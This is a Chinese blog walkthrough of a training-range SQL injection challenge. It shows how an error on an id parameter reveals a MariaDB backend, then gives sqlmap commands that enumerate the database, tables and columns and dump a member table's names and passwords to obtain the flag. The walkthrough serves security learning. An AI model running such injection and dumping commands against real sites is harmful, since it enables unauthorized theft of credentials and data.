当前位置:网站首页>墨者学院-SQL注入漏洞测试(报错盲注)
墨者学院-SQL注入漏洞测试(报错盲注)
2022-06-26 23:42:00 【Lyswbb】
前言
本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
首先拿到靶场后审题,可以很明显看到是报错注入

拿到靶场后访问目标

在用户登陆下方点击关于平台停机维护的通知

点击后发现url为 http://124.70.71.251:46004/new_list.php?id=1
尝试添加单引号后报错,发现数据库为mariaDB

知道了注入点,直接sqlmap一把梭就行了
爆库名
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 --dbs
爆表名
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup --tables
爆字段名
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member --columns
爆name和password的内容
python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member -C name,password --dump 


最后登录成功拿到 flag

边栏推荐
- The client implements client Go client type definition connection
- Outside the code: writing is the best way to force growth
- Why does EDR need defense in depth to combat ransomware?
- Simulation of delta variant strain of novel coronavirus (mindsponge application)
- Is the low commission free account opening channel safe?
- 超硬核!华为智慧屏上的家庭相册竟可以自动精准分类?
- Operations research says that in issue 66, Behrman also has "speech phobia"?
- Using physical information neural network to solve hydrodynamics equations
- 冲刺强基计划数学物理专题二
- Is it safe to open an account and speculate in stocks on the mobile phone? Is it safe to open an account and speculate in stocks on the Internet
猜你喜欢

Safe and cost-effective payment in Thailand

Amway! How to provide high-quality issue? That's what Xueba wrote!

My advanced learning notes of C language ----- keywords

全网最全的混合精度训练原理

【UVM实战 ===> Episode_3 】~ Assertion、Sequence、Property

go中的微服务和容器编排

通过两个stack来实现Queue

ASP. Net core create MVC project upload file (buffer mode)

com.fasterxml.jackson.databind.exc.MismatchedInputException: Expected array or string. at [Source:x

Competition Registration | one of the key ai+ scientific computing competitions - China open source scientific software creativity competition, competing for 100000 bonus!
随机推荐
万字详解-MindArmour 小白教程!
[test] the content of the hottest test development learning route has been updated again to help pass the customs and open the test of large factories
串口调试工具 mobaxterm 下载
Common techniques of email attachment phishing
test
消息队列简介
Encapsulate servlet unified processing request
Would you like to buy stocks? Where do you open an account in a securities company? The Commission is lower and safer
[vscode] setting sync, a plug-in for synchronizing extensions and settings
Leetcode 718. Longest repeating subarray (violence enumeration, to be solved)
12 color ring three primary colors
Introduction to message queuing
Openpyxl module
The client implements client Go client type definition connection
手机网上开户炒股安全吗 网上开户炒股安全吗
国产框架MindSpore联合山水自然保护中心,寻找、保护「中华水塔」中的宝藏生命
kubernetes可视化界面dashboard
How to use Pinia (I) introduce Pinia into the project
大赛报名 | AI+科学计算重点赛事之一——中国开源科学软件创意大赛,角逐十万奖金!
运用物理信息神经网络求解流体力学方程